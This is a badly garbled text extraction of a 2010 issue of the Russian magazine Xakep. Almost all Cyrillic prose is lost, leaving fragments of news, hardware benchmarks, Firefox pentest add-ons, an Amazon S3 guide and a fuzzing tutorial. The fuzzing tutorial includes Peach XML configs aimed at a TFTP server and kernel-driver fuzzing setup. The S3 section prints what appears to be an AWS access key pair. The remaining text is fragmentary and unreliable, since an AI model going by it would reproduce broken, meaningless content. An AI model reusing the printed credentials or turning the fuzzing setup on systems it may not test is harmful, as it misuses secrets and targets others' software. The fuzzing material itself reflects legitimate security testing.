Вы находитесь на странице: 1из 148

.

110

x 07 () 2010

.
210
:

WEB-

07 (138) 2010

AMAZON S3


. 26


. 52

138

LOTUS DOMINO
SKYPE



. 107

INTRO
CENSORED

-
. ,
Google,
e-mail ,
,
.
,
, ,
,
.

:


.
,
, ,
, ,

e-mail ICQ

.



. ,
VPN,

,
.
,
.
, ! :)

nikitozz, . .
udalite.livejournal.com

MegaNews

004

084

FERRUM
016

32

020

Intel


Samsung ML-1660

PC_ZONE
022
026
031
032
038

Firefox-

Mozilla

Amazon S3

10 reverse-engineering

, ,

, ,

042

Easy-Hack

046

052
058
064
068
071
076

C,

090

096
100

Qubes OS
Linux,

Linux

-x86 - Linux

104
107
110
114

Windows

C++

SYN/ACK
116
120

D-link 500T


Hyena 8.0


Cisco Systems Juniper Networks

124

...

129

ProcFS Web-

Lotus Domino

, mod_rewrite

ProcFS

- 134

ROP,

X-Tools

140

MALWARE

143

078

144

082

Skype


: AVG, AVIRA AVAST?

DrWeb

Windows *nix

nginx Web-

PSYCHO:
!

FAQ UNITED

FAQ

8.5

WWW2

web-

052

D-link 500T

078


: AVG, AVIRA AVAST?

058

104

Lotus Domino

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

Windows

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>




> Gameland TV

>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

Google, ,
, , .
, Google Street View
Google
Streets. , -

. ,
Street View SSID MAC- Wi-Fi-, ,
. - : ,
Wi-Fi-,
,
Wi-Fi-.
Google, ,
. , , ,
Google. - :
. ,
.
.
, Google .
-, . -, (
, 5 ).
? Google ,
.
.

2010 ANDROID OS 28% ,


IPHONE OS 21%

PALM
, ,
Palm, , HP $1,2 .,
$5,70 . , , , ,
HP , Palm . HP ,
Palm webOS.
,
iPad, HP Slate, , Windows 7,
, webOS. , ,
webOS : HP
,
. HP Google
(Matias Duarte), Palm - , webOS.
UI- Android.

004

X 07 /138/ 10

MEGANEWS

IMAGINE CUP 2010


3 8 IT- Microsoft
Imagine Cup.
: ( Software design) (Embedded development).
,
, -,
. ,
www.imaginecup.
com, www.microsoft.com/rus/imaginecup. !

2009 -
59,7 .

,

, 1-2 , , , . , Seagate
-
: , ,

3 .
, ,

, ,
, . ,


LBA, 2,1
.
Long LBA, ,
, 64-
Win 7 Vista , Windows
XP 2,1 .


,
Theora H.264
,
.
,
.
Google,
Google I/O
WebM,
VP8, Vorbis -

Matroska. , Google On2 ,


VP3 VP8 ( ), .
, WebM , , ,


. WebM
Chromium,

Opera, Firefox (
www.webmproject.org),
YouTube, HTML5
URL &webm=1.

16384x16384,
, ,
.


,
.
Wi-Fi
,
,
.
Kindle, ,
, Barnes & Noble
Nook. ,
Android , Read

006

In Store - . Amazon

Kindle,
Facebook Twitter, PDF
.
,
Nook. ,
Barnes & Noble
Android, ,
: E-ink
.
X 07 /138/ 10

MEGANEWS


LG W2363D,
3D. 23- Full HD (1920x1080), 70000:1
3 . 120- , ,
. G MODE:
Thru Mode ; RC
, ; AutoBright
; SRS Tru-surround HD
.
,
Tru-Light. Tru-Light
.
NVIDIA GeForce 3D Vision,
6000 .
17000 .

APP STORE -
BitTorrent,
- Torrent. Torrent
, ,
Apple App Store.
Torrent, Griffin.
.btapp, HTML JavaScript, . App Store
Torrent 2.2 (
). , ,
uTorrent , . , ,
, : , . , ,
.

83%



DoS-,
, . ,
- ,
,
Imperva. : Exeman
-,
300 .
GUI- (90 PHP).
DDoS .
, -
, .
,
.

008

X 07 /138/ 10

MEGANEWS


IT-. 14- CEO Summit ,
Microsoft, , MS
.
,
-, ,
. ,
DRM, ,
, .

IPAD
200 000 ,

MAC

180 000

ANDROID
GOOGLE

,
.
- CyberBunker
50- . , CyberBunker
7 .
Columbia Pictures, Disney Enterprises, Paramount
Pictures, Twentieth Century Fox, Universal Warner Bros
- .
6 2010 , CyberBunker The Pirate Bay .
, CB3ROB,
, , CyberBunker ,
. , TPB , , ,
. ,
TPB !
, ,
: ,
TPB , The
Pirate Bay .

? WHOYOUGLE!
-
, . Rambler ,
WhoYOUgle (, ).
, , , ,
. ?
http://whoyougle.ru, 1- 2009
. WhoYOUgle ,
( dolboeb).
WhoYOUgle
,

010

100 940 --
.
.

X 07 /138/ 10

MEGANEWS


,
,

mp3- .

,
,
- .




,
. - ,
, , ,
, ,
.


,
(
, )
0,5% . , , ,
, -
. .

$20 WI-FI


Wi-Fi .

, , Wifi Box
(wifi-box.com),
20-30 .
Made in China:
, USB- Wi-Fi,
Linux, Backtrack.
,
WEP/WPA . , kismet aircrack GUI-
Spoonwep Spoonwpa. ,
, ,
.
Backtrack , Wi-Fi
- dealextreme.com. - RTL8187L. ,
.
$20 .
, : ,
. ,
nag.ru lan23.ru.

RAPIDSHARE WINS!

20


USENET-.
1979
30
012

,

-

. RapidShare
,
,

.

RapidShare

.

,
, RapidShare .



RAR. - .
, Google top-1000
. Rapidshare
40- !

X 07 /138/ 10

,

-, ,
. -, ,
,
( Coding). , , Gsou
, , . - D30 - .
,
Skype MSN.
, , ,
, , HD, .

MANDRIVA

,
Mandriva - , . ,
, .
Mandriva Linux 2008 ,
,
Mandriva
, .
, , Mandriva , ,
.
, Mandriva
,
.

3D HD
: Sharp
3D
HD-.
,
,
, ,
- . , ,
HD (720p2),
, ( ,
), 3D-.
,
,
.
X 07 /138/ 10

013
13

MEGANEWS


Thermaltake,
, ,
, ,
! Tt eSPORTS
:
Challenger Challenger Pro.
: Challenger Pro
18 (
Challenger 12 ),
64
( 32 ),
USB 2.0 ( Challenger )
( ). ,
. ,


, :).
$55 Challenger $75
Challenger Pro.

1 300 000

GOOGLE TV
Google . Google TV,

Sony Logitech,
-. Google TV

,
-
, ( HDMI-
).

YouTube
-
Google Chrome.
Google TV ,
-,
( )
. Google
TV
.

. .
2010 LD

LD Select c . LD Select


,
, -

014

.
LD Select :
LD Select Red (10/0,8 /), 1 LD Select Blue (6/0,5
/) LD Select Silver
2 (4/0,4 /). LD Select ,
.
X 06 /137/ 10


,
. - , (MPA),
Usenet- Newzbin. , MPA, , . , ,
- Team R
Dogs, Newzbin . Mr.White , - .
DeepSharer .
, .
,
Newzbin, , Newzbin2
.

5 PAC-MAN,

GOOGLE 30-

X 06 /137/ 10

015

ASRock H55M
Pro
MSI H55-GD65

FERRUM

MSI H55-GD65
Gigabyte GAH55M-UD2H


32
HP Pavilion
dv6t

Dell Studio
1515

S H55H-CM

ASUS P7H55-M
Pro

ASUS
M4A78T-E

ASUS
INTEL M4A78T-E

32- Westmere
Intel H55/57 Express.
, , .
.
?
, Intel
H55/H57 Express, , .
Intel H57 Express
Intel Core,
i3 i7. PCI
Express (,
), DVI,
DisplayPort ( HDCP) HDMI,
SATA, RAID, USB,
, PCI Express . Intel H55 Express H57
RAID- ,
PCI Express x1 ( ).

BCLK,
MSI H55-GD65
ASRock H55M Pro
ASUS P7H55-M Pro

Palit
GeForce GT
240 Sonic

Gigabyte GA-H55M-UD2H
ECS H55H-CM
Foxconn H55MX-S

50

100

150

200

250

300



,
.
BCLK 214 (4922\23). , SuperPI
1.5XS 1M, wPrime 2.0 32M, Lavalys Everest Ultimate Edition.


, : 3.06, Intel Core i3-540
, : 2x2, Geil Black Dragon
, : 512, ATI Radeon HD 5670
, : 1.5, Seagate Barracuda
ST31500341AS
: Noctua NH-D14
, : 1000, ZALMAN ZM1000-HP
: Windows XP Professional, SP3, x32

ASUS
MSI

WINRAR
MSI H55-GD65
ASRock H55M Pro
ASUS P7H55-M Pro

Palit
GeForce GT
240 Sonic

Gigabyte GA-H55M-UD2H
ECS H55H-CM
Foxconn H55MX-S

win RAR 3.9

win RAR 3.9 (OC)

1000

2000

3000

WinRAR

016

X 07 /138/ 10

EVEREST:

MSI H55-GD65

Palit GeForce
GT 220 Sonic
ASUS P7H55-M Pro
Palit
Gigabyte GA-H55M-UD2H
GeForce GT
240 Sonic
ECS H55H-CM

MSI H55-GD65

Palit GeForce
ASRock H55M Pro
GT 220 Sonic
ASUS P7H55-M Pro
Palit
Gigabyte GA-H55M-UD2H
GeForce GT
ECS H55H-CM
240 Sonic
Foxconn H55MX-S
wPrime 2.00 32m (OC), c
SuperPi
1.5 XS 1m (OC), c

wPrime 2.00 32m, c

ASRock H55M Pro

10

15

20

SuperPi 1.5 XS 1m, c

Foxconn H55MX-S

5000

ASRock H55
Pro
10000

15 000

/
Everest memory copy (OC)
Everest memory write (OC)

Everest memory read (OC)


Everest memory copy

Everest memory write


Everest memory read


Everest

ASUS
P7H55-M PRO

4500 .

ASROCK
H55M PRO

3400 .

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4XDDR3, 1066 2133
: 1XIDE, 6XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X1, 2XPCI
: D-SUB, DVI, HDMI, 6XUSB 2.0, SPDIF, RJ-45, PS/2
: 7.1 HDA REALTEK
: GIGABIT ETHERNET
-: 245X245 , MATX

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4X DDR3, 1066-2600+
: 5XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X16 ( X4), 1XPCI-E
X1, 1XPCI
: D-SUB, DVI, HDMI, 5XUSB 2.0, ESATA/USB, FIREWIRE,
SPDIF, RJ-45, PS/2
: 7.1 HD VIA VT1718S
: GIGABIT ETHERNET
-: 244X244 , MATX

ASUS
Clarkdale, , ,
. ,
,
. . ,
206 , . ,
BIOS, Turbo V,
.

, ASRock
, ,
. , ASRock H55M Pro ,
.
ATI CrossFire X,
, , PCI-E
x1 PCI. ,
193 , , , ,
.

ASUS, ,
. , PCI Express x4, , , , ,
.


. , ,
. ,
.

X 07 /138/ 10

017

ASUS P7H55M Pro


ECS H55H-CM

FERRUM

Samsung
R580

MSI H55-GD65

GD65
Samsung
R580
MSI H55-GD65

3500 .

2900 .

ECS
H55H-CM

FOXCONN
H55MX-S

,
. 16
4 PCI-E x1
. SATA. .

, , , ,
,
.
PCI Express x4, (
),
.

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4XDDR3, 1066/1333
: 6XSATA 3 /
: 1XPCI-E X16, 2XPCI-E X1, 1XPCI
: D-SUB, HDMI, 6XUSB 2.0, RJ-45, 2XPS/2, LPT
: 5.1 HD REALTEK ALC662 ( 7.1 REALTEK
ALC888)
: GIGABIT ETHERNET
-: 244X244 , MATX

, ,
,
PCI Express x1 . , , : BIOS
,
BCLK,
. 160 ,
,
.

018

: INTEL H55 EXPRESS


: LGA 1156
, : 8, 2XDDR3, 1066/1333
: 6XSATA 3 /
: 1XPCI-E X16, 1XPCI-E X4, 2XPCI
: DVI, HDMI, 6XUSB 2.0, SPDIF, COM, RJ-45, PS/2
: 7.1 HDA REALTEK ALC888S
: GIGABIT ETHERNET
-: 244X218 , MATX


. , -
mATX, ,
, 8 .
, BIOS
,
. ,
.
X 07 /138/ 10

5ASRock H55M Pro

MSI H55-G
Gigabyte GAH55M-UD2H

Gigabyte GAH55M-UD2H
MSI H55-GD65

3600 .

GIGABYTE
GA-H55M-UD2H
:

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4DDR3, 800 2200+
: 1XIDE, 1XFDD, 5XSATA
: 2XPCI-E X16, 2XPCI
: D-SUB, DVI, HDMI, DISPLAYPORT, 6XUSB 2.0,
FIREWIRE, SPDIF, ESATA, RJ-45, PS/2
: 7.1 HD REALTEK ALC889
,: GIGABIT ETHERNET REALTEK RTL8111D
-: 244X230 , MATX

, , , DDR3
2133 . Intel Core i5 i7, , 1066 . ,
ATI CrossFire X,
. , Ultra
Durable 3,
.

, ,
,
165 , Gigabyte . , FPS
, .

X 07 /138/ 10

4500 .

MSI
H55-GD65
:

: INTEL H55 EXPRESS


: LGA 1156
, : 16, 4XDDR3, 1066-2133+
: 1XIDE, 7XSATA
: 2XPCI-E X16, 2XPCI-E X1, 2XPCI
: D-SUB, DVI, HDMI, 6XUSB 2.0, FIREWIRE, SPDIF,
ESATA, RJ-45, 1XPS/2
: 7.1 HD REALTEK ALC889
: GIGABIT ETHERNET, REALTEK 8111DL
-, : 305X225, ATX

- ATX, , ,
eSATA, ,
. , .
.
4876 ,
. ,
,
.


. , .

019

FERRUM

4490 .



SAMSUNG ML-1660

,
. , ,
.
, . . , .
Samsung ML-1660,
. . . .
020

X 07 /138/ 10


, dpi: 1200x600
, \: 16
, : 8
, : 150
, : 321x224x181
, : 4.2


,
:
, , .
, .
10
.
, ,
, .

, ,
. Samsung ML-1660
. , ,
. .
,
,
, .
, , . , ,
. ,
, ,
, , ,
, .
, . ,
- .

, , Samsung ML-1660
,
. . \
: , ,
, (
),
.

X 07 /138/ 10

,
. , , ,
,
. , !
Samsung AnyWeb Print,
.
.
- ,
Print!
, ,
.

, Samsung ML-1660 , , . ? -
. 10
45,6 ,
8 ,
.
, ,
, .
,
, , - ,
. ,
,
. .
,
.
ML-1660, - , , .

Samsung
.
, ,
, . ,
.
. z

021

PC_ZONE
Step step@glc.ru

FIREFOX-

Mozilla

, Firefox' . : , -, .
,
, .

,
: ,
.
x-toolz

. ,
HTTP-, ,
User-Agent, fingerprinting ,
,
. .

FINGERPRINTING' FIREFOX'


: , , .
,
,
. CMS/
/, -

022

, , . ,
,
.
. , <meta
name="generator" content="WordPress 2.8.4"
/> ,
Wordpress'.
,

Wappalyzer. , ,
, ,

. .
Wappalyzer
,
, , -, .

JS-
( Google
Analytics).
,
.
ShowIP
, IP-
, ,
whois.

HTTP-

,
, ,
. HTTP/HTTPS-
-, Fiddler'.
, ,
X 07 /138/ 10

Wappalyzer

HTTP-

, .
HttpFox Live
HTTP Headers.

HTTP-,
, ,
POST- .. ,


. : Modify Headers
, , ,
.
User Agent ,
, HTTP- ,
. ,
, User Agent Switcher,
.
Tamper Data
,
.
, POST-.
,
GET,
URL,

. POST
,
, , . , Tamper Data
VisualHack'.
,
. ,

X 07 /138/ 10

. ,
GET- POST-
Fireforce. ,
,
, ,
, .
,
?
FuzzyFox .

, - .
, ,
,
.
,
. , , Firefox
cookies,
( ). , Add N Edit Cookies,


. ,

,
, Allcookies
.

CookieSwap. ,

,
. , ,
,
Google ,
, Gmail.

JS-

Gmail, Facebook
-,
JavaScript.
, , , . ,
Firefox
Javascript Firebug.

JS , ,
JS-. Firebug

, , .
if-breakpoint',
.
,
, .


?
Firefox ,
. , -
, . Firefox'
: ,
3.5, 3.6.3 .
, ? Nightly
Tester Tools.
- ,
.

023

PC_ZONE

POST-

User
Agent
, ;
watch'. ,
- ,

. Firebug Firefox


JS-, HTML-,
CSS .
Inspect,
,
Firebug ,
.

,

View Dependencies.
, , JS/CSS-.
(-,
JS- JS- )
, , .

, , -,
( JavaScript), , -,

.

024

, ,
. ,
JavaScript
Deobfuscator.
, JS-
,
, ( ) .
Tools
,
/.

, XSS,


XSS-, SQL
,
Firefox' HackBar. ,


,
. HackBar
, ,

. SQL-,
SQL Injection. ,
SQL-,
, ,

.
SQL Inject Me, security- Seccom

SQL-

Labs. ,
,
( ) ,
.
.
XSS XSS Me. HTML-,

,
XSS-. HTML-
JS- (document.vulnerable=true),

XSS.

FLASH-

Flash, .
SWF- , -
.
Flashbug, Firebug' SWF-,
. Firebug' ,
, AMF-, , ( , )
Flash ActionScript.
X 07 /138/ 10

Firebug

JS-


FireFlash
ActionScript , ,
, XML Flash-, Firebug console.
,
,
SWF-, , . Firebug,
Firefox , .

,
.
.
,
IP. ,
, IP:
Google Voice, Pandora Radio ..
. ,
,
, FoxyProxy.
,
,
.
,
. , , ,
, . Tor, Firefox'
Torbutton,
.
,
FireGPG.
, , , Gmail,
GnuPG.
Tracking-,
(,
X 07 /138/ 10

). ,
,
.
Flash-cookies,
LSO- (Local Shared Objects) - ,
, ,
.
? Tracking-
BetterPrivacy.

NoScript. .
, ,
XSS Clickjacking :). ,
JS, Java Flash
, .
Firekeeper,
IDS- Snort.

DVD
dvd


DVD-.

][-


,
.
,
(,
) , ,
,
. Greasemonkey, . ,
, ,
-
.

userscripts.org.
.
,
. iMacros, TestGen4Web,
Chickenfoot.
? ,

025

PC_ZONE
Step step@glc.ru

Amazon S3



.
. . , .

Twitter .
.


-
,

-
s3.amazonaws.com.
, Amazon
S3. :
,

026

Dropbox (www.dropbox.com) ,

, Amazon S3? , , !
,

, 99.9%
.
.
.


,
, . ?
flickr .
, -
,
. .
, ,
?
,
X 07 /138/ 10


bucket' .
.
.

S3Fox
,
.
,
, ,
?
, DVD,
:
. ,
,
,
Amazon S3. .

S3?

Amazon S3 Amazon
Simple Storage Server
Amazon. ,
.
,
?, , .
.
. (,
SCSI).
. ,

, ...
.
-,
, 10
36.6-. , , ,
-
. ,
, ,
.
Amazon S3.
, . 10 , 1
5000
(,
5 ). Amazon ,
.
, - , ,
X 07 /138/ 10

Google
, . , Amazon S3
. .
, S3
,
. ,
S3
,
. ,
.
? :
99.99% ;
99.999999999% .
, . , , Amazon
S3. .
, .

, Amazon S3 ,
, .
,
.
(
- ) , .
Amazon :
, . 50
$0.150. 4.5
! ,
( ),

($0.01 1000 ). ,
,
(calculator.s3.amazonaws.com/calc5.
html). ,

Access Key ID Secret Access


Key S3-
Amazon S3 (

), .
20 , 5 ,
(
5 ). PUT/COPY/POST/
LIST 5 ,
GET. ,
Add to bill .
,
,
99.99% , $3.66
, 100 .

. ,

: S3
,
cloud-storage . ,
,
,
,
S3. ,
,
! .

Reduced Redundancy
Storage (RRS).
S3,

. , , ,
- -

027

PC_ZONE

. ,

.

400 (!) ,
. (
),
. ,
Amazon S3 , ,
.
:

, ,
.


, . ,
, :
Sing up for Amazon S3
aws.amazon.
com/s3.
- - Amazon ( ,
, Radar-
, ),
.
. ,
Amazon' , S3,
Amazon Web Service (AWC).
, ,
. ,
, , Visa
Mastercard. : ,
: Webmoney, .
. ,
.
:
,
. : ,
(
,
cvv2- ).
Visa Virtuon 200
,
, . ,
Visa ,
:). Amazon
,
,
.
: , ?.
.
,

. .

028


,
.
.

,
, S3
,
. Amazon .
: ,
FTP- SSH-
. Amazon S3
key-based .
, ,
, , .

bucket' S3,

.
, . , scanner.zip
xtoolz,
S3 xtoolz/
scanner.zip.
, bucket'. Bucket

Amazon S3,
.
bucket
Amazon S3,
bucket' . , xtoolz/scanner.zip
bucket' xakep, , URL http://xakep.s3.amazonaws.
com/xtoolz/scanner.zip.
bucket' ,
.

,


bucket'. ,
http://xakep.s3.amazonaws.com/xtoolz/scanner.
zip,
All.
REST SOAP,
( ).
: bucket,
(
bucket), (
HTTP BitTorrent ),
, (
,
).
,
. S3
, .
, ,
,

.

bucket'
, , ?
.
Firefox S3Fox (addons.mozilla.org/en-US/
firefox/addon/3247):
.
,

. email Amazon
. S3
, .

Access Key ID Secret Access Key (
X 07 /138/ 10

INFO

info

Amazon S3


Dropbox
. 2

,
5 ,

.

CloudBerry Explorer

). ,
Security Credentials,

(aws.amazon.com/account). :

. ,

. , Amazon S3 , , .
, ,
... .
RRS, .
,
CloudBerry Explorer (cloudberrylab.com).

Access Key ID: AKIAIEAXASBKAUVBX3DQ


Secret Access Key: 6Xr1nEFZ5jWVtPc7wU6AubHe
bTW54Ue0dWV4dCa0

, S3Fox,
, , . S3Fox,
:
, .
, , bucket.
.
bucket
,
.
, URL ,
URL
. . ,
.
, .
- Copy URL (http://xakep.
s3.amazonaws.com/xtoolz/scanner.zip). :
AccessDeniedAccess Denied31D32B892AF10B41tDO
SXPdDmixz7CkanMA1GoYbaBhgcTjQy8l93OqTNsXXJqm
j3snzF2fOdlAQJvQ9

. (Edit ACL)
. S3Fox

X 07 /138/ 10

HTTP://WWW
links


Amazon S3:
www.s3fm.com

, . S3-.
-, :
Amazon S3,
. -, ,
( S3Fox
!). ,
: ,
,
S3.
-, CloudBerry Explorer
bucket' Amazon S3.
,
. ,
( S3Fox, ).
-,
Amazon S3.
ACL- . , , BitTorrent (
generate bittorent url).
Torrent'.
Amazon S3, ,

029

PC_ZONE

.torrent-
,
, : s3cmd --configure.
, , .
. , s3cmd
rsync,
:
s3cmd --acl-private --bucketlocation=EU --guess-mime-type
--delete-removed sync /local/
backup/ s3://xakep/backupfromserv1

S3-
.
,
. ,

,
. :
CloudBerry Explorer . ,
,
. ,
$40, . -,
, Amazon S3.
, -,
Powershell-
.
c:\
workdata bucket xakep,
,
(2010_06_01
):
$new_folder_format = Get-Date
-uformat "%Y_%m_%d"
$s3 = Get-CloudS3Connection -Key
$key -Secret $secret
$destination = $s3 | SelectCloudFolder -path "xakep" | AddCloudFolder $new_folder_format
$src = Get-

030

CloudFilesystemConnection |
Select-CloudFolder -path "c:\
workdata\"
$src | Copy-CloudItem $destination
-filter "*"

.
,
S3 . CloudBerry Explorer
, ,
, CloudBerry
Online Backup.
S3 Backup (www.maluke.com/software/
s3-backup), , .

,
.
S3
5 . , ,
.

S3 LINUX

,
.
s3- s3cmd
(s3tools.org/s3cmd). Ubuntu
, : apt-get
install s3cmd.
, , -

--acl-private ,
.
--bucket-location=EU
( ,
). --guess-mime-type
, MIME-
,
.
S3-, ,
--delete-removed. , .
,
? :
s3cmdsyncs3://xakep/
backupfromserv1/local/backup/

,
bucket', ls:
s3cmd ls s3://xakep

, bucket xakep
. ,
s3tools:
s3cmd --acl-private --bucketlocation=EU mb s3://xakep

cron
,
. ,
?
, . z
X 07 /138/ 10

PC_ZONE
STEP TWITTER.COM/STEPAH

10 REVERSE-ENGINEERING

, ,
, W32Dasm.
, . 2000 , W32Dasm
Turbo Debugger .
, .
SOFTICE. ,
,
, SoftICE.
, NuMega,
, , . ,
, OllyDbg (www.ollydbg.de) WinDbg (www.
microsoft.com). , ,
SoftICE ,
, .
: 2000-
UNICODE
.
OllyDbg
, , ,
UNICODE 2.0
, -.

.
if-else
. ,

, .
,
,
.

IDA Pro 4.17 ( 2001 ), , 5.0,
.
X 07 /138/ 10

PYTHON' . , 2000
,
. Python SWIG , Python
Python' API.
IDAPython (d-dome.net/idapython)
IDA Pro,
IDA API Python.
PyDbg (pedram.redhive.com/PyDbg)
pefile (code.google.com/p/pefile).
Python -
, , IDA Pro
Immunity Debugger BinNavi,
Python.
.
-
:
,
- , .
,
.

- BinDiff (www.
immunitysec.com/products-bindiff.shtml).
,
: ,
,
A
B,

.

.
2000- ,
. 2007
IDA Pro Hex-Rays (www.hex-rays.com),
, -,
.


ARM,

.
.

,
.

,
.
CollabREate
(www.idabook.com/collabreate) IDA
Pro BinCrowd (bincrowd.zynamics.
com).
, SaaS,

, ,
.
?
. 2020
,
, :). z

031

PC_ZONE
Step twitter.com/stepah

,
,
,
,

CanSecWest PWN2OWN
.
. , , .
-,
.

Fuzzing 1988
The Fuzz Generator,
.



, ,
.

.
: ,
,

032

, ,
-
.
, ActiveX- , ,
SWF-.


.

,
, -

.
, , .
, ,
. JPEG- ,
:
?. , ,
,
, .
, ,
X 07 /138/ 10

miniFuzz dumb-
Microsoft

Adobe Reader 9.2.0 ,


Charlie Miller

.
,

. ,

:
JPEG-, .
, ,
.
, ,
,
. ,
,
, .
,
:
(dump)
.
, ,

,
.
(smart)
.
, ,
, , , .
, , ,
.

,

SDL (Security Development Lifecycle),
Microsoft

,
fuzz-. Minifuzz
; , ,
(, winword.exe test_sample.
doc).

,
Template files,


MiniFuzz (www.microsoft.
com). Microsoft
.
X 07 /138/ 10

033

PC_ZONE


PeachPit

,
.
Start Fuzzing,
,
( Aggressiveness)
.
( 2 ), ,
.
,
.
(!), ,
-, -,
, , -, crash-
.
Minifuzz Visual Studio,
fuzz-
Tools
MiniFuzz. , - MiniFuzz ,
dumb FileFuzz (labs.idefense.com/
software/fuzzing.php),
Microsoft, security-
iDefense Labs.

MiniFuzz (
) dump-,
Peach (peachfuzzer.com, ),
smart,
, .

034

,
.

PeachPit ( ) XML-,
, ,
.
Minifuzz, Peach
, , RPC,
COM/DCOM, SQL-
. ,
.
: ,
,
. ,
Peach ,
, . WinDBG
,
Wireshark Winpcap,

.
Peach'
PeachPit. ,
XML- ,
,
, .

Visual Studio, PeachPit',
.
-

.
,
- template.xml,
.
PeachPit' .
,
( , ..),
.
TFTP
(Read).
RFC, :
TFTP PACKET
---------------------------------| \x00\x01 | Filename | 0 | Mode
| 0 |
----------------------------------

, HEX \x00\x01,

. Filename
Mode . ,
,
Filename.
PeachPit' RFC:
<DataModel name="tftprrx">
<Blob name="opcode"
valueType="hex" value="00 01"
token="true"/>
<String name="filename"
value="filename.txt"
nullTerminated="true"/>
<String name="mode"
value="NETASCII" token="true"
X 07 /138/ 10

Peach

nullTerminated="true"/>
</DataModel>

,
.
token="true"
, Peach,
, . ,
,
filename, ,

(, , ).
, . filename mode
nullTerminated, ,
-. ,

(blob string).
, .
, ,
.
, ,
,
PeachPit'. ,
filename, .
Peach',
(Action type="output"),
tftprrx:
<StateModel name="state1"
initialState="Initial">
<State name="Initial">
<Action type="output">
<DataModel ref="tftprrx"/>
</Action>
X 07 /138/ 10

</State>
</StateModel>


. .
-
,
( ,
).
,
(Exploitable, Probably Exploitable, Probably Not
Exploitable, Unknown),
WinDBG !exploitable (msecdbg.codeplex.com).
, TFTPD32 UDP-,
69 (TFTP):
<Agent name="RemoteAgent" location="http://1
92.168.1.10:9000">
<Monitor class="debugger.WindowsDebugEngine">
<Param name="Service" value="TFTPD32" />
</Monitor>
<Monitor class="network.PcapMonitor">
<Param name="filter" value="udp port 69" />
</Monitor>
</Agent>

.
, ,
secuiryt- .
( filename), , . ,
.

DVD
dvd


DVD-.

WARNING

warning
.



. ,

.

035

PC_ZONE

IOCTL Fuzzer

<Test name="tftprrx">
<Agent ref="RemoteAgent"/>
<StateModel ref="state1"/>
<Publisher class="udp.Udp">
<Param name="host"
value="192.168.1.10" />
<Param name="port" value="69" />
</Publisher>
</Test>

publisher ,
.
TFTP UDP,
. ,

(Run). ,

:
<Run name="DefaultRun">
<Logger class="logger.Filesystem">
<Param name="path" value="logs"/>
</Logger>
<Test ref="tftprrx"/>
</Run>
</Peach>

Peach'
, .
,

036

?
.
,

TFTP (, write), ,
XML- .

PeachPits' peachvalidator.pyw.
,
Peach:
peach.py -a
peach.py tftpfuzzer.xml

,
XML-.

,
,

. , , .


Ring0. ,
, (
, ) . , ,

: ,
, ,
IRP-. I/O request
packets (IRP) ,
Windows

. ,
,
. ,
,

.

IOCTL Fuzzer (code.google.
com/p/ioctlfuzzer),
fuzzing-,
IRP-.
( ,

),
NtDeviceIoControlFile,

IRP-
. , IRP-

.
IRP,
X 07 /138/ 10

. IRP-
, .
, -,

XML-,
. ,
.

.
IOCTL Fuzzer
- ,
BSOD,
:).

,
.
Microsoft,

WinDbg,
, .
VMware WinDbg
(named pipe), .
1.
VMware.
Settings Configuration Editor,
(Add), Serial Port,
Next,
Use named pipe

(\\.\pipe\com_1). This end is server. The
other end is application
Advanced, Yiled
CPU on poll ( ).
. boot.
ini ( ,
Windows XP)
, /
debugport /baudrate:
[operating systems]
multi(0)disk(0)rdisk(0)
partition(1)\WINDOWS="Microsoft
Windows XP Professional" /
fastdetect
multi(0)disk(0)rdisk(0)
partition(1)\WINDOWS="Microsoft
Windows XP Professional - Debug"
/fastdetect /debugport=com1 /
baudrate=115200


,
X 07 /138/ 10

. ,


:
windbg -b -k com:pipe,port=\\.\
pipe\com_1,resets=0

IOCTL Fuzzer
, BSOD
.
,

( ,
, ,

).
(
WinDbg F5),
,
, (crash
dump) . :
, , .
, :).

-?


web-based
,
HTTP -
-.


-,

(PDF-
).
,
Sulley (code.
google.com/p/sulley),
Blackhat' 2007 . ,
,

.

,
Peach, XML-,
Python.
SPIKE (www.immunitysec.
com/resources-freesoftware.shtml),
,
C.
ActiveX, COM-
. .
,
:


.
,
,

. z

037

PC_ZONE

-, , :
, - HTTPS, - IM-. .
: ,
- ? ,
.
GMAIL


The Bat!,
.
PGP
.
, , Gmail
-,
,

038

. , Google :

HTTPS , ,
. ,
Browser connection
Always use https. ,
, -
Wi-Fi,

Gmail ,
, PGP/GPG.
-, Firefox',

FireGPG (ru.getfiregpg.org/s/install). ,
PGP
: (private)
(public), , X 07 /138/ 10

Firefox

,
. ,

,
, .
.
FirePGP ,
- Gmail
GnuPG,
. ,
:
Windows: gpg4win (www.gpg4win.org/
download.html);
Linux': GnuPG (www.gnupg.org/download/
index.en.html);
MacOS: Mac GPG (macgpg.sourceforge.net).
, ,
Firefox .
, ,
, ,
.
Gmail FirePGP Gmail, .
Gmail
. ,

PGP/GPG .
Gmail ,
,
. Gmail
-,
POP/IMAP/SMTP.
X 07 /138/ 10

, , :
PGP, ,
. ,
,
.

Jabber' (
).
ICQ? ,
, , ,
SSL. , ,
? ,
-
.
. ,

SOCKS-,

.


